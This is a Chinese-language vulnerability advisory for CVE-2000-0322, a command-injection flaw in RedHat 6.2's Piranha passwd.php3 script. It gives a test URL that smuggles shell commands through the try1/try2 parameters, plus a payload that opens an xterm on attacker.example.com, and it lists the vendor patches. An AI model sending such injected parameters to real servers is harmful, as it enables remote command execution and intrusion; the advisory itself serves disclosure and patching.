RedHat Piranha软件包中passwd.php3脚本执行任意…
2008-04-09 04:33:14来源:互联网 阅读 ()
发布日期:2000-04-24
更新日期:2000-04-24
受影响系统:
RedHat passwd.php3描述:
- RedHat Linux 6.2 alpha
- RedHat Linux 6.2 x86
- RedHat Linux 6.2 sparc
BUGTRAQ ID: 1149
CVE(CAN) ID: CVE-2000-0322
RedHat 6.2附带Piranha virtual server软件包中passwd.php3脚本存在一个安全漏洞。
passwd.php3脚本由于未对输入进行适当的检查,导致任何可以通过Piranha软件包鉴别机制的用户以当前WWW服务器对应之有效用户ID,执行任意命令。这将作为进一步损害系统安全
性的前奏攻击手段。
<*来源:Max Vision (vision@whitehats.com)
链接:http://online.securityfocus.com/advisories/2177
http://online.securityfocus.com/archive/1/56904
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
执行下列URL,需要提供一组用户名/口令进行鉴别:
http://victim.example.com/piranha/secure/passwd.php3
现在执行这样一个URL:
http://victim.example.com/piranha/secure/passwd.php3?try1=g23 ; touch /tmp/r00ted ;&try2=g23 ; touch /tmp/r00ted ;&passwd=ACCEPT
结果将在 /tmp 目录下产生一个名为 r00ted 的文件。
的确可能存在更复杂的攻击方式,例如提供给try1/try2下列内容:
g23 ;/usr/X11R6/bin/xterm -display attacker.example.com:0 -ut;
将在attacker.example.com上打开一个xterm窗口。
建议:
厂商补丁:
RedHat
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
RedHat Linux 6.2 sparc:
Red Hat Inc. RPM 6.2 sparc piranha-gui-0.4.13-1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/piranha-gui-0.4.13-1.sparc.rpm
RedHat Linux 6.2 i386:
Red Hat Inc. RPM 6.2 i386 piranha-gui-0.4.13-1.i386.rpm
ftp://updates.redhat.com/6.2/i386/piranha-gui-0.4.13-1.i386.rpm
RedHat Linux 6.2 alpha:
Red Hat Inc. RPM 6.2 alpha piranha-gui-0.4.13-1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/piranha-gui-0.4.13-1.alpha.rpm
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash